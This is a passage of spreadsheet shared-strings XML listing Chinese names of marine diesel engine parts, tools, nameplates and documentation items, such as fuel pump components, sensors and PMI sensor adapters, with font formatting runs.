      </rPr>
      <t>传感器底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承热传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机自动化</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温，恒压器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>慢转盒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮刻度</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位开关盒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机控制箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏水传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏水继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鼓风背压监控</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>WOODWARD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器信息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动盒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负载控制略图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程锁扣限制器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停缸活塞头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀标准螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母，蜗杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属波纹管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切断阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封弹簧工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵壳体取出工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵提前角测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环衬套安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封压入工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵毛坯法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双面推力销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵盖总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向柱塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>迷宫环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵控制台安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前板切断</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动部件安装板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯取出工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>临界转速铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油前铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油后铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机齿轮啮合铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>照明铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵齿轮铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刹车轴指示牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥输入铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动调节活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定零件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零件板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温恒压器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴冷却泵</t>
    </r>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵备件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>DN25</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定套件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>SERBOCROATIAN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零部件安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粘度传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油放气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气罐</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊单元总布置图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带齿轮的轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转包装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油密封环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰盘轴承总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离式接头部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车指南</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机控制单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部传感器适配器</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部传感器适配器</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器适配器螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位移传感器橡胶垫</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器适配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器适配器密封环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球头销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
